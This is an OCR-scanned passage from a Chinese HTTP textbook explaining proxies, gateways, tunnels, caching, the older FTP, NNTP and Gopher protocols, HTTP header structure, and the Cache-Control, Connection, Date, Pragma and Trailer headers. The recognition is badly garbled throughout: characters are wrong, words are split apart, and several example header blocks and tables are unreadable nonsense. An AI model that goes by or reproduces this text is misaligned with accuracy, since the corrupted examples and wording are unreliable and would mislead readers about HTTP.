iVia: proxy2, proxy1， 4 VIa: proxy2 J 


图 : 每 次 通过 代理 服务 器 转发 请 求 或 啊 应 时 ， 会 人 妃 加 写 入 Via 首部 信息 


在 HITP 通信 过 程 中 ， 可 级 联 多 人 台 代 理 服 务 希 。 请 求 和 啊 应 的 转发 
会 经 过 数 台 类 似 锁链 一 样 连接 起 来 的 代理 服务 名 。 转 发 时 ， 需 要 附加 
Via 首部 字段 以 标记 出 经 过 的 主机 信息 。 
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I 


\ 
ETA 





这 个 请 求 无 法 通过 呀 





客户 端 代理 服务 器 
通过 设置 组 织 内 部 的 代理 服务 器 可 做 到 针对 特定 URI 访 问 的 控制 。 


使 用 代理 服务 天 的 理由 有 : 利用 缓存 技术 〈 稍 后 讲解 ) 减少 网 络 市 
宽 的 流量 ,组 织 内 部 针对 特定 网 站 的 访问 控制 ， 以 获取 访问 日 志 为 主要 
目的 ， 等 等 。 
代理 有 多 种 使 用 方法 ， 按 两 种 基准 分 类 。 一 种 是 是 否 使 用 缓存 ， 羽 
-种 是 是 否 会 修改 报 文 。 


缓存 代理 

代理 转发 啊 应 时 ， 绥 存 代 理 (Caching Proxy ) 会 预先 将 资源 的 副本 
(缓存 ) 保存 在 代理 服务 硕 上 。 

当代 理 再 次 接收 到 对 相同 资源 的 请 求 时 ， 束 可 以 不 从 源 服 务 融 那里 
获取 资源 ， 而 是 将 之 前 绥 存 的 资源 作为 啊 应 返回 。 
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透明 代理 

转发 请 求 或 啊 应 时 ， 不 对 报 文 做 任何 加 工 的 代理 类 型 被 称 为 透明 代 
理 (Transparent Proxy )。 反 之 ， 对 报 文 内 容 进 行 加 工 的 代理 被 称 为 
非 透 明代 理 。 
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非 HTTP 协 议 通信 


A 、\ 
[| 
eee EN 7 We™~ 


HTTP 请 求 


庆 户 请 HTTP 响 应 





非 HTTP 服 务 器 


: 利用 网 关 可 以 由 HTTP 请 求 转化 为 其 他 协议 通信 


网 关 的 工作 机 制 和 代理 十 分 相似 。 而 网 关 能 使 通信 线路 上 的 服务 需 
提供 非 HTTP 协议 服务 。 
利用 网 关 能 提高 通信 的 安全 性 ， 因 为 可 以 在 客户 端 与 网 关 之 间 的 通 
音 线 路 上 加 密 以 确保 连接 的 安 人 全。 比如， 网关 可 以 连接 数据 库 ， 使 用 
SQL 语句 查询 数据 。 男 外 ， 在 Web 购物 网 站 上 进行 信用 卡 结算 时 ， 网 
070 关 可 以 和 信用 卡 结算 系统 联动 。 











5.2.3 ”隧道 

隧道 可 按 要 求 建立 起 一 条 与 其 他 服务 器 的 通信 线路 ， 届 时 使 用 SSL 
等 加 密 手 段 进行 通信 。 隧 道 的 目的 是 确保 客户 端 能 与 服务 器 进行 安全 的 
通信 。 

隧道 本 身 不 会 去 解析 HTTP 请 求 。 也 就 是 说 ， 请 求 保持 原样 中 转 给 
之 后 的 服务 器 。 隧 道 会 在 通信 双方 断 开 连接 时 结 





立 安全 的 通信 线路 


外 
本 
S 
POA 站 
Ci 
@ 9 
一 一 
C (9| 
一 
Oy 
MA 
\ 


隧道 


半 





图 : 通过 隧道 的 传输 ， 可 以 和 远 距离 的 服务 器 安全 通信 。 隧 道 本 身 是 透明 的 ， 
客户 端 不 用 在 意 隧道 的 存在 
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5.3 ”保存 资源 的 缓存 


缓存 是 指 代理 服务 天 或 客户 端 本 地 磁盘 内 保存 的 资源 副本 。 利 用 组 
存 可 减少 对 源 服务 各 的 访问 ， 因 此 也 就 市 省 了 通信 流量 和 通信 和 时间。 

人 并 归 类 在 缓存 代理 类 型 中 。 换 名 
话说 ， 当 代理 转发 从 服务 带 返 回 的 啊 应 时 ， 代 理 服务 表 将 会 保存 一 份 资 
源 的 副本 。 











缓存 服务 器 产 服 务 器 071 


转发 响应 时 ,复制 资源 后 
index.htm ‖ 保存 在 缓存 服务 器 上 


请 求 的 资源 如 果 已 经 被 缓存 则 直接 由 缓存 
服务 器 返回 给 客户 端 


(Neen ee htm HTTP/1.1 1 
NAN 


会 向 源 服务 器 确认 
缓存 资源 的 有 效 性 





客户 端 缓存 服务 器 








缓存 服务 髓 的 优势 在 于 利用 缓存 可 避免 多 次 从 源 服务 需 转 发 资源 。 
因此 客户 端 可 就 近 从 缓存 服务 需 上 获取 资源 ， 而 源 服务 融 也 不 必 多 次 处 
理 相 同 的 请 求 了 。 
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nn 


5.3.1 缓存 的 有 效 期 限 

即便 缓存 服务 天 内 有 缓存 ， 也 不 能 保证 每 次 都 会 返回 对 同 资源 的 请 
求 。 因 为 这 关系 到 被 缓存 资源 的 有 效 性 问题 。 

当 遇 上 源 服 务 郁 上 的 资源 更 新 时 ， 如 采 还 是 使 用 不 变 的 缓存 ， 那 就 
会 污 变 成 返回 更 新 前 的 “ 旧 ” 资 源 了 。 

即使 存在 缓存 ， 也 会 因为 客户 端的 要 求 、 绥 存 的 有 效 期 等 因素 ， 问 
源 服 务 胡 确认 和 质 源 的 有 效 性 。 大 判断 缓存 失效 ， 绥 存 服务 表 将 会 再 次 从 
源 服务 各 上 获取 “新 ”资源 。 

















缓存 服务 器 源 服务 颖 


上 个 月 的 缓存 本 月 更 新 的 资源 


5.3.2 ”客户 端的 缓存 

缓存 不 仅 可 以 存在 于 缓存 服务 器 内 ， 还 可 以 存在 客户 端 浏览 器 中 。 以 
Internet Explorer 程序 为 例 ， 把 客户 闪 绥 人 存 称 为 临时 网 络 文件 ( Temporary 
Internet File )。 

浏览 融 缓 存 如 末 有 效 ， 就 不 必 再 癌 服务 喜 请 求 相同 的 资源 了 ， 可 以 
直接 从 本 地 磁盘 内 读 取 。 

另外 ， 和 组 存 服务 硕 相同 的 一 点 是 ， 当 判定 缓存 过 期 后 ， 会 回 源 服 
务 各 确认 资源 的 有 效 性 。 春 判断 浏览 硕 绥 存 失 效 ， 浏 览 硕 会 再 次 请 求 新 
资源 。 
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客户 站 


在 HTTP 出 现 之 前 的 协议 

在 HTTP 普及 之 前 ， 也 就 是 从 互联 网 的 诞生 期 至 今 ， 曾 出 现 过 各 式 各 
样 的 协议 。 在 HTTP 规范 确立 之 际 ， 制 定 者 们 参考 了 那些 协议 的 功能 。 也 
有 某 些 协议 现在 已 经 彻底 退出 了 人 们 的 视线 。 接 下 来 ， 我 们 会 简单 介绍 一 
下 这 些 协 议 。 


FTP ( File Transfer Protocol ) 

传输 文件 时 使 用 的 协议 。 该 协议 历史 久远 ， 可 追溯 到 1973 年 前 后 ， 
比 TCP/IP 协议 族 的 出 现 还 要 早 。 虽 然 它 在 1995 年 被 HTTP 的 流量 
( Traffic ) 超越 ， 但 时 至 今日 ， 仍 被 广泛 沿用 。 


NNTP ( Network News Transfer Protocol ) 

用 于 NetNews 电子 会 议 室 内 传送 消息 的 协议 。 在 1986 年 前 后 出 现 ， 
属于 比较 古老 的 一 类 协议 。 现 在 ， 利 用 Web 交换 信息 已 成 主流 ， 所 以 该 
协议 已 经 不 怎么 使 用 了 。 


Archnie 
搜索 anonymous FTP 公开 的 文件 信息 的 协议 。1990 年 前 后 出 现 ， 现 
在 已 经 不 常 使 用 。 
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WAIS ( Wide Area Information Servers )) 
以 关键 词 检索 多 个 数据 库 使 用 的 协议 。1991 年 前 后 出 现 。 由 于 现在 
已 经 被 HTTP 协议 蔡 代 ， 也 已 经 不 怎么 使 用 了 。 


Gopher 
查找 与 互联 网 连接 的 计算 机 内 信息 的 协议 。1991 年 前 后 出 现 ， 由 于 
现在 已 经 被 HTTP 协议 替代 ， 也 已 经 不 怎么 使 用 了 。 
图 项 男 
国 四 
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第 6 章 
HTTP 下 部 


HTTP 协 议 的 请 求 和 响应 报 文中 必定 包含 HTTP 首 部， 只 是 我 们 平 
时 在 使 用 Web 的 过 程 中 感受 不 到 它 。 本 章 我 们 一 起 来 学 习 HTTP 
首部 的 结构 ， 以 及 首部 中 各 字段 的 用 法 。 





国 图 灵 社区 会 员 Dylan.Y(yuanlongyoung@gmail.com) 专 享 尊重 版 权 





or 


6.1 HTTP 报 文 首部 


加 在 客户 端 和 服务 器 处 理 时 
报 文 首部 起 至 关 重要 作用 的 信息 几 


乎 都 在 这 边 


所 需要 的 用 户 和 资源 的 信 
息 都 在 这 边 





图 : HTTP 报 文 的 结构 





HTTP 协议 的 请 求 和 啊 应 报 文 中 必定 包含 HTTP 首部 。 首 部 内 容 为 
客户 端 和 服务 带 分 别处 理 请 求 和 啊 应 提供 所 需要 的 信息 。 对 于 客户 端 用 
户 来 说 ， 这 些 信息 中 的 大 部 分 内 容 都 无 须 亲 目 查 看 。 











on 报 文 首部 由 几 个 字段 构成 。 
HTTP 请 求 报 文 
在 请 求 中 ，HTTP 报 文 由 方法 、URI、HTTP 版 本 、HTTP 首部 字段 
等 部 分 构成 。 
1 方法 URI、 
HTTP 版 
请 求 首部 字段 
通用 首部 字段 HTTP 首 部 字段 
实体 首部 字段 
其 他 








: 请 求 报 文 





下 面 的 示例 是 访问 http:/hackrjp 时 ， 请 求 报 文 的 首部 信息 。 


GE Hm/ 
GOSiweisckeaaalle 
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User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/ 一 
SIONNOION OT ey 

Accept: text/html,application/xhtml+xml,application/xml ;gq=0.9,3 
*/*; q=0.8 

Accept-Language: ja,en-us;dq=0.7,en;qd=0.3 

Accept-Encoding: gzip, deflate 

DIN: 

Connection: keep-alive 

Moe Snel 2 00 0 02 20ReGME 

TE Neone Matelh: "45bael 16a 46d//6aey 

@aehe Comtrol:max age=0 


HTTP 啊 应 报 文 
在 响应 中 ，HTTP 报 文 由 HTTP 版 本 、 状 态 码 (数字 和 原因 短语 )、 
HTTP 首部 字段 3 部 分 构成 。 























状态 行 > HTTP 版 本 、 
响应 首部 字段 状态 码 
通用 首部 字段 HTTP 首 部 字段 
实体 首部 字段 

其 他 











: 响应 报 文 








以 下 示例 是 之 前 请 求 访 问 http:/hackrjp/ 时， 返回 的 响应 报 文 的 首 


部 信息 /DO 


HTTP/1.1 304 Not Modified 

Dalse GME 
Server: Apache 

Connection: close 

Eeaeee Aslaenl Ma A eaen 





在 报 文 众多 的 字段 当中 ，HTTP 首部 字段 包含 的 信息 最 为 丰富 。 
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EL 








自 部 字段 同时 存在 于 请 求 和 响应 报 文 内 ， 并 涵 产 HTTP 报 文 相关 的 内 
容 信息 。 

因 HTTP 版 本 或 扩展 规范 的 变化 ， 首 部 字段 可 文 持 的 字段 内 容 略 有 
不 同 。 本 书 主要 涉及 HTTP/1.1 及 常用 的 首部 字段 。 











6.2 ”HTTP 首部 字段 


6.2.1 HTTP 首部 字段 传递 重要 信息 

HTTP 首部 字段 是 构成 HTTP 报 文 的 要 素 之 一 。 在 客户 端 与 服务 需 
之 间 以 HTTP 协议 进行 通信 的 过 程 中 ， 无 论 是 请 求 还 是 啊 应 都 会 使 用 首 
部 字段 ， 它 能 起 到 传递 额外 重要 信息 的 作用 。 

使 用 首部 字段 是 为 了 给 浏览 锅 和 服务 融 提 供 报 文 主体 大 小 、 所 使 用 
的 语言 、 认 证 信息 等 内 容 。 
























我 是 Apache 服务 器 ， 你 能 
5 分钟 后 再 过 来 访 则 0o3? 


我 正 使 用 的 这 个 浏览 器 只 能 
理解 中 文 ， 舱 请 谅解 。 


: 首部 字段 内 可 使 用 的 附加 信息 较 多 


6.2.2 HTTP 首部 字段 结构 
HTTP 首部 字段 是 由 首部 字段 名 和 字段 值 构成 的 ， 中 间 用 冒号 “:” 


分 隔 。 








首部 字段 名 : 字段 值 


图 灵 社 区 会 员 Dylan.Y(yuanlongyoung@gmail.com) 专 享 尊重 版 权 


第 6 章 HTTP 首 部 





例如 ， 在 HTTP 首部 中 以 Content-Type 这 个 字段 来 表示 报 文 主体 的 
对 象 类 型 。 


Content -Type: text/html 











就 以 上 述 示例 来 看 ， 首 部 字段 名 为 Content-Type， 字 符 串 text/html 
是 字段 值 。 
另外 ， 字 段 值 对 应 单个 HITP 首部 字段 可 以 有 多 个 值 ， 如 下 所 示 。 














Keep-Alive: timeout=15, max=100 


国 国 
| 国 国 

若 HTTP 首部 字段 重复 了 会 如 何 

当 HTTP 报 文 首部 中 出 现 了 两 个 或 两 个 以 上 具有 相同 首部 字段 名 时 会 
怎么 样 ? 这 种 情况 在 规范 内 尚未 明确 ， 根 据 浏 览 器 内 部 处 理 逻 辑 的 不 同 ， 
结果 可 能 并 不 一 致 。 有 些 浏 览 器 会 优先 处 理 第 一 次 出 现 的 首部 字段 ， 而 有 
些 则 会 优先 处 理 最 后 出 现 的 首部 字段 。 

图 国 图 


6.2.3 4 种 HTTP 首部 字段 类 型 
HTTP 首部 字段 根据 实际 用 途 被 分 为 以 下 4 种 类 型 。 





通用 首部 字段 ( General Header Fields ) 
请 求 报 文 和 啊 应 报 文 两 方 都 会 使 用 的 首部 。 
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请 求 首部 字段 ( Request Header Fields ) 
从 容 户 端 向 服务 右 端 发 送 请 求 报 文 时 使 用 的 首部 。 补 充 了 请 求 的 附 
加 内 容 、 客 户 端 信息 、 响 应 内 容 相 关 优先 级 等 信息 。 





响应 首部 字段 ( Response Header Fields ) 
从 服务 器 端 癌 客户 端 返 回响 应 报 文 时 使 用 的 首部 。 补 充 了 啊 应 的 附 
加 内 容 ， 也 会 要 求 客户 端 附加 额外 的 内 容 信 息 。 


实体 首部 字段 ( Entity Header Fields ) 
针对 请 求 报 文 和 啊 应 报 文 的 实体 部 分 使 用 的 首部 。 补 充 了 资源 内 容 
更 新 时 间 等 与 实体 有 关 的 信息 。 








6.2.4 HTTP/1.1 首部 字段 一 览 
HTTP/1.1 规范 定义 了 如 下 47 种 首部 字段 。 


表 6-1: 通用 首部 字段 
首部 字段 名 说 明 
Cache-Control 控制 缓存 的 行为 
Connection 逐 跳 首部 、 连 接 的 管理 
Date 创建 报 文 的 日 期 时 间 








Pragma 报 文 指令 


Trailer 报 文 末端 的 首部 一 览 
Transfer-Encoding 指定 报 文 主体 的 传输 编码 方式 
Upgrade 升级 为 其 他 协议 

Via 代理 服务 器 的 相关 信息 


Warning 错误 通知 
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表 6-2: 请 求 首 部 字段 
首部 字段 名 说 明 
Accept 用 户 代理 可 处 理 的 媒体 类 型 


Accept-Charset 优先 的 字符 集 








Accept-Encoding 优先 的 内 容 编码 


期 待 服务 器 的 特定 行为 
用 户 的 电子 邮箱 地 址 
请 求 资源 所 在 服务 


If-Modified-Since 比较 资源 的 更 新 时 间 
If-None-Match 比较 实体 标记 ( 与 上 f-Match 相反 ) 
资源 未 更 新 时 发 送 实体 Byte 的 范围 请 求 081 


If-Unmodified-Since 比较 资源 的 更 新 时 间 ( 与 |f-Modified-Since 相 反 ) 
Max-Forwards 最 大 传输 逐 跳 数 
Proxy-Authorization 代理 服务 器 要 求 客 户 端的 认证 信息 


Range 实体 的 字 节 范围 请 来 


Referer 对 请 求 中 URI 的 原始 获取 方 
传输 编码 的 优先 级 
表 6-3: 响应 首部 字段 
是 否 接受 字 节 范围 请 求 














工资 源 创 建 经 过 时 间 
资源 的 匹配 信息 


Location 令 客 户 端 重 定 向 至 指定 URI 
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首部 字段 名 说 明 
Proxy-Authenticate 代理 服务 器 对 客户 端的 认证 信息 


HTTP 服 务 器 的 安装 信息 
代理 服务 器 缓存 的 管理 信息 


WWW-Authenticate 服务 器 对 客户 端的 认证 信息 





表 6-4: 实体 首部 字段 


Allow 资源 可 支持 的 HTTP 方法 

实体 主体 适用 的 编码 方式 
Content-Language 实体 主体 的 自然 语言 

实体 主体 的 大 小 ( 单位 : 字 市 ) 








替代 对 应 资源 的 URI 
实体 主体 的 媒体 类 型 
实体 主体 过 期 的 日 期 时 间 


Last-Modified 资源 的 最 后 修改 日 期 时 间 





6.2.5 非 HTTP/1.1 首部 字段 

在 HITP 协议 通信 交互 中 使 用 到 的 首部 字段 ， 不 限于 RFC2616 中 
定义 的 47 种 首部 字段 。 还 有 Cookie、Set-Cookie 和 Content-Disposition 
等 在 其 他 RFC 中 定义 的 首部 字段 ， 它 们 的 使 用 频 认 也 很 高 。 

这 些 非 正式 的 首部 字段 统一 归纳 在 RFC4229 HTTP Header Field 
Registrations 中 。 
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6.2.6 ” ”End-to-end 首部 和 Hop-by-hop 首部 
HTTP 首部 字段 将 定义 成 缓存 代理 和 非 缓存 代理 的 行为 ， 分 成 2 种 


类 型 


= 一] 





端 到 端 首部 ( End-to-end Header ) 
分 在 此 类 别 中 的 首部 会 转发 给 请 求 / 啊 应 对 应 的 最 终 接 收 目标 ， 且 
必须 保存 在 由 缓存 生成 的 啊 应 中 ， 另 外 规定 它 必 须 被 转发 。 














逐 跳 首 部 ( Hop-by-hop Header ) 
分 在 此 类 别 中 的 首部 只 对 单 次 转发 有 效 ， 会 因 通 过 缓存 或 代理 而 不 
再 转发 。HTTP/1.1 和 之 后 版 本 中 ， 如 果 要 使 用 hop-by-hop 首部 ， 


需 提 供 Connection 首部 字段 。 








下 面 列举 了 HTTP/1.1 中 的 逐 跳 首部 字段 。 除 这 8 个 首部 字段 之 外 ， 
其 他 所 有 字段 都 属于 端 到 端 首部 。 





® Connection 

@ Keep-Alive 

® Proxy-Authenticate 
® Proxy-Authorization 
@ Trailer 

@ TE 

® Transfer-Encoding 


® Upgrade 


6.3 HTTP/1.1 通用 首部 字段 
通用 首部 字段 是 指 ， 请 求 报 文 和 响应 报 文 双方 都 会 使 用 的 首部 。 
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6.3.1 Cache-Control 
通过 指定 首部 字段 Cache-Control 的 指令 ， 就 能 操作 缓存 的 工作 机 制 。 








图 : 首部 字段 Cache-Control 能 够 控制 缓存 的 行为 


指令 的 参数 是 可 选 的 ， 多 个 指令 之 间 通 过 “,” 人 分隔。 首部 字段 
084 ”Cache-Control 的 指令 可 用 于 请 求 及 啊 应 时 。 





Cache-Control: private, max-age=0, no-cache 


图 Cache-Control 指令 一 览 
可 用 的 指令 按 请 求 和 响应 分 类 如 下 所 示 。 


表 6-5: 缓存 请 求 指令 


秒 





秒 
no-transform 无 代理 不 可 更 改 媒体 类 型 
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指令 
从 缓存 获取 资源 


新 指令 标记 ( token ) 





public 可 向 任意 方 提供 响应 的 缓存 
private 1 仅 向 特定 用 户 返 回响 应 





no-cache 1 缓存 前 必须 先 确认 其 有 效 性 
no-store 不 缓存 请 求 或 响应 的 任何 内 容 





可 缓存 但 必须 再 向 源 服务 器 进行 确认 


要 求 中 间 缓 存 服务 器 对 缓存 的 响应 有 效 性 再 进行 085 
确认 


max-age =[ 秒 ] 需 响应 的 最 大 Age 值 
s-maxage = [ 秒 ] 需 公共 缓存 服务 器 响应 的 最 大 Age 值 


表示 是 否 能 缓存 的 指令 


public 指令 











Gacnes Geriieaci ol ie: 








当 指 定 使 用 public 指令 时 ， 则 明确 表明 其 他 用 户 也 可 利用 缓存 。 
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private 指令 





缓存 服务 器 


Cache-Control: private 


当 指 定 private 指令 后 ， 啊 应 只 以 特定 的 用 户 作 为 对 象 ， 这 与 public 











指令 的 行为 相反 。 
086 缓存 服务 带 会 对 该 特定 用 户 提 供 资 源 缓存 的 服务 ， 对 于 其 他 用 户 发 





送 过 来 的 请 求 ， 代 理 服 务 胡 则 不 会 返回 缓存 。 


no-cache 指令 


客户 端的 角度 







我 不 要 组 有 存 过 的 ， 
请 给 我 从 汤 眼 务 器 
和 里 拿 来 的 资源 






Cache-Control: no-cache 
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使 用 no-cache 指令 的 目的 是 为 了 防止 从 缓存 中 返回 过 期 的 资源 。 

客户 端 发 送 的 请 求 中 如 果 包 含 no-cache 指令 ， 则 表示 客户 端 将 不 会 
接收 绥 存 过 的 啊 应 。 于 是 ,“ 中 间 ” 的 缓存 服务 硕 必 须 把 客户 端 请 求 转 发 
给 源 服务 硕 。 

如 果 服 务 需 返回 的 啊 应 中 包含 no-cache 指令 ， 那 么 缓存 服务 需 不 能 
对 资源 进行 缓存。 源 服 务 硕 以 后 也 将 不 再 对 缓存 服 务 硕 请 求 中 提出 的 资 
源 有 效 性 进行 确认 ,日 禁止 其 对 啊 应 资源 进行 缓存 操作 。 














Cache-Control: no-cache=Location 


由 服务 器 返回 的 啊 应 中 ， 硅 报 文 首 部 字段 Cache-Control 中 对 no- 
cache 字段 名 具体 指定 参数 值 ， 那 么 客户 端 在 接收 到 这 个 被 指定 参数 值 
的 首部 字段 对 应 的 啊 应 报 文 后 ， 就 不 能 使 用 缓存。 换言之 ， 无 参数 但 的 
首部 字段 可 以 使 用 缓存 。 只 能 在 啊 应 指令 中 指定 该 参数 。 


控制 可 执行 缓存 的 对 象 的 指令 











no-store 指令 


Cache-Control: no-store 











当 使 用 no-store 指令 “ 时， 暗示 请 求 (和 对 应 的 响应 ) 或 响应 中 包 
含 机 密 信 息 。 
因此 ， 该 指令 规定 绥 存 不 能 在 本 地 存储 请 求 或 啊 应 的 任 一 部 分 。 





〇 从 字面 意思 上 很 容易 把 no-cache 误 解 成 为 不 缓存 ， 但 事实 上 no-cache 代 表 不 
缓存 过 期 的 资源 ， 缓 存 会 向 源 服务 器 进行 有 效 期 确认 后 处 理 资源 ， 也 许 称 为 
do-not-serve-from-cache-without-revalidation 更 合适 。no-store 才 是 真正 地 不 进 
行 缓存 ， 请 读者 注意 区 别 理解 。 译 者 注 
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指定 缓存 期 限 和 认证 的 指令 


s-maxage 指令 


Cache-Control: s-maxage=604800 ( 单位 : 秒 ) 


s-maxage 指令 的 功能 和 max-age 指令 的 相同 ， 它 们 的 不 同 点 是 
s-maxage 指令 只 适用 于 供 多 位 用 户 使 用 的 公共 缓存 服务 器 ”。 也 就 是 说 ， 
对 于 癌 同 一 用 户 重 复 返 回 啊 应 的 服务 器 来 说 ， 这 个 指令 没有 任何 作用 。 

为 外 ， 当 使 用 s-maxage 指令 后 ， 则 下 接 忽 略 对 Expires 首部 字段 及 
max-age 指令 的 处 理 。 


max-age 指令 


客户 端的 角度 
088 






缓存 服务 器 





一 周 内 不 必 再 向 我 确认 ， 
你 直接 支配 该 强 存 好 了 


Cache-Control: max-age=604800 (单位 ; 秒 ) 








当 客 户 端 发 送 的 请 求 中 包含 max-age 指令 时 ， 如 果 判 定 缓存 资源 的 


OD) 这 里 一 般 指 代理 。 





译 者 注 
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绥 存 时 间 数 值 比 指定 时 间 的 数值 更 小 ， 那 么 客户 器 就 接收 缓存 的 资源 。 
另外 ， 当 指定 max-age 值 为 0， 那么 缓存 服务 从 通常 需要 将 请 求 转发 给 
源 服 务 右 。 

当 服 务 需 返回 的 啊 应 中 包含 max-age 指令 时 ， 绥 存 服务 大 将 不 对 资 
源 的 有 效 性 再 作 确 认 ， 而 max-age 数 信 代表 资源 保存 为 缓存 的 最 长 时 间 。 

应 用 HTTP/1.1 版 本 的 绥 存 服务 融 遇 到 同时 存在 Expires 首部 字段 的 
情况 时 ， 会 优先 处 理 max-age 指令 ， 而 忽略 抒 Expires 首部 字段 。 而 
HTTP/1.0 版 本 的 缓存 服务 器 的 情况 却 相反 ，max-age 指令 会 被 忽略 掉 。 





min-fresh 指令 
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Coone Cont ol mn Fresnoeo (my AD, 


min-fresh 指令 要 求 缓存 服务 需 返 回 至 少 还 未 过 指定 时 间 的 绥 存 资源 。 
比如 ， 当 指定 min-fresh 为 60 秒 后 ， 过 了 60 秒 的 资源 都 无 法 作为 
啊 应 返回 了 。 





max-stale 指令 


Ce IO 
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ER 


使 用 max-stale 可 指示 绥 存 资源 ， 即 使 过 期 也 照 津 接收。 

如 有 果 指 令 未 指定 参数 值 ， 那 么 无 论 经 过 多 久 ， 客 户 绒 都 会 接收 啊 应 ; 
如 果 指 令 中 指定 了 具体 数值 ， 那 么 即使 过 期 ， 只 要 仍 处 于 max-stale 指定 
的 时 间 内 ， 仍 旧 会 被 客户 端 接收 。 





only-if-cached 指 令 


Cache-Control: only-if-cached 


使 用 only-if-cached 指令 表示 客户 端 仅 在 缓存 服务 吉本 地 组 存 目 标 
资源 的 情况 下 才 会 要 求 其 返回 。 换 言 之 ， 该 指令 要 求 绥 人 存 服务 关 不 重新 
加 载 啊 应 ， 也 不 会 再 次 确认 资源 有 效 性 。 耕 发 生 请 求 缓存 服务 右 的 本 地 
绥 存 无 啊 应 ， 则 返回 状态 码 504 Gateway Timeout。 


must-revalidate 指令 


Cache-Control: must-revalidate 


使 用 must-revalidate 指令 ， 代 理会 癌 源 服务 硕 再 次 验证 即将 返回 的 
响应 绥 存 目前 是 否 仍然 有 效 。 

看 代理 无 法 连通 源 服务 大 再 次 获取 有 效 资 源 的 话 ， 绥 存 必 须 给 客户 
珊 一 条 504( Gateway Timeout ) 状态 码 。 

另外 ， 使 用 must-revalidate 指令 会 忽略 请 求 的 max-stale 指令 ( 即使 
已 经 在 首部 使 用 了 max-stale， 也 不 会 再 有 效果 )。 











proxy-revalidate 指令 


Cache-Control: proxy-revalidate 
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proxy-revalidate 指令 要 求 所 有 的 绥 存 服务 天 在 接收 到 客户 端 市 有 该 
指令 的 请 求 返 回 啊 应 之 前 ， 必 须 再 次 验证 绥 存 的 有 效 性 。 








no-transform 指令 


Cache-Control: no-transform 


使 用 no-transform 指令 规定 无 论 是 在 请 求 还 是 啊 应 中 ， 绥 存 都 不 能 
改变 实体 主体 的 媒体 类 型 。 
这 样 做 可 防止 缓存 或 代理 压缩 图 片 等 类 似 操作 。 


Cache-Control 扩展 


cache-extension token 
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Cache Comereon orvase eommoy ny 


通过 cache-extension 标记 ( token )， 可 以 扩展 Cache-Control 首部 字 
段 内 的 指令 。 

如 上 例 ，Cache-Control 首部 字段 本 号 没有 community 这 个 指令 。 依 
助 extension tokens 实现 了 该 指令 的 添加 。 如 采 组 人 存 服务 硕 不 能 理解 
community 这 个 新 指令 ， 就 会 直接 忽略 。 因 此 ，extension tokens 仅 对 能 
理解 它 的 缓存 服务 需 来 说 是 有 意义 的 。 














6.3.2 Connection 
Connection 首部 字段 具备 如 下 两 个 作用 。 


e 控制 不 再 转发 给 代理 的 首部 字段 
。 管理 持久 连接 
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ER 


图 控制 不 再 转发 给 代理 的 首部 字段 


GET 7 HTTP/1 wi] GET W Ey ell 
Uy Gl DL We 
bE / 首部 字段 Upgrade 被 删除 后 再 转发 


Connection: Upgrade 










源 服务 器 





把 这 个 删除 后 由 
转发 嘻 


Connection: 不 再 转发 的 首部 字段 名 
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在 客户 端 发 送 请 求 和 服务 天 返回 啊 应 内 ， 使 用 Connection 首部 字 
段 ， 可 控制 不 再 转发 给 代理 的 首部 宇 段 〈( 即 Hop-by-hop 首部 )。 





图 管理 持久 连接 


Connection close 





这 下 我 和 你 的 关系 
暂且 结束 3 


Connection: close 
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HTTP/1.1 版 本 的 默认 连接 都 是 持久 连接 。 为 此 ， 客 户 端 会 在 持久 
连接 上 连续 发 送 请 求 。 当 服务 磊 端 想 明 确 汤 开 连 接 时 ， 则 指定 
Connection 首部 字段 的 值 为 Close。 





A) emp 
Connection: Keep-Alive 





客户 站 D) [rTe/ 00 ok 


Keep-Alive: timeout=10, max=500 
Connection: Keep-Alive 


Connection: Keep-Alive 


HTTP/1.1 之 前 的 HTTP 版 本 的 默认 连接 都 是 韭 持久 连接 。 为 此 ， 
如 采 想 在 旧版 本 的 HTTP 协议 上 维持 持续 连接 ， 则 需要 指定 Connection 
首部 字段 的 值 为 Keep-Alive。 

如 上 图 则 所 示 ， 客 户 绒 发送 请 求 给 服务 器 时 ， 服 务 带 端 会 像 上 图 2 
那样 加 上 首部 字段 Keep-Alive 及 首部 字段 Connection 后 返回 啊 应 。 








6.3.3 Date 
首部 字段 Date 表明 创建 HTTP 报 文 的 日 期 和 时 间 。 







HTTP 报 文 创建 于 2012 
年 7 月 3 日 (周二 >4 点 


40 分 59 和 
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nn 


HTTP/1.1 协议 使 用 在 RFC1123 中 规定 的 日 期 时 间 的 格式 ， 如 下 
示例 。 


Del epeeVE 





之 前 的 HTTP 协议 版 本 中 使 用 在 RFC850 中 定义 的 格式 ， 如 下 
所 示 。 


站 BESTIUE SU 有 全 全 


除 此 之 外 ， 还 有 一 种 格式 。 它 与 C 标准 库 内 的 asctime0 函数 的 输 
出 格式 一 致 。 


Dalaes 工 U 全 JU 03 0 和 3 各 0559 写 0 工 3 


6.3.4 Pragma 

Pragma 是 HTTP/1.1 之 前 版 本 的 历史 遗留 字段 ， 仅 作为 与 HITP/1.0 
的 回 后 莱 容 而 定义 。 

规范 定义 的 形式 唯一 ， 如 下 所 示 。 





EndenmeE ee eele 








该 首部 字段 属于 通用 首部 人 字段， 但 只 用 在 客户 闹 发 送 的 请 求 中 。 客 
户 问 会 要 求 所 有 的 中 间 服 务 带 不 返回 绥 存 的 资源 。 
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Eralemee ee eee 


ss 


客户 站 中 间 服 务 器 


所 有 的 中 间 服 务 器 如 果 都 能 以 HITP/1.1 为 基准 ， 那 直接 采用 
Cache-Control: no-cache 指定 绥 存 的 人 处理 方式 是 最 为 理想 的 。 但 要 整体 
擎 握 全 部 中 间 服 务 融 使 用 的 HTTP 协议 版 本 却 是 不 现实 的 。 因 此 ， 发 送 
的 请 求 会 同时 含有 下 面 两 个 首部 字段 。 














Cache-Control: no-cache 


Bndaenae .ne eone 


6.3.5 Trailer 






在 报 文 曲 录 后 写 3 很 
重要 拘 东 西 ， 记 得 要 
仔细 人 阅读 哦 








首部 字段 Trailer 会 事先 说 明 在 报 文 主体 后 记录 了 哪些 首部 字段 。 该 
首部 字段 可 应 用 在 HTTP/1.1 版 本 分 块 传输 编码 时 。 





HTTP/1.1 200 OK 
Dalse ue T0200: S560CME 
Content-Type: text/html 
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EL 


Transfer-Encoding: chunked 


Trailer: Expires 


CR 
0 
Expires: Tue, 28 Sep 2004 23:59:59 GMT 








以 上 用 例 中 ， 指 定 首 部 字段 Trailer 的 值 为 Expires， 在 报 文 主体 之 
后 (分 块 长 度 0 之后) 出 现 了 首部 字段 Expires。 


6.3.6 Transfer-Encoding 


用 这 种 传输 编码 方式 发 送 呈 





096 


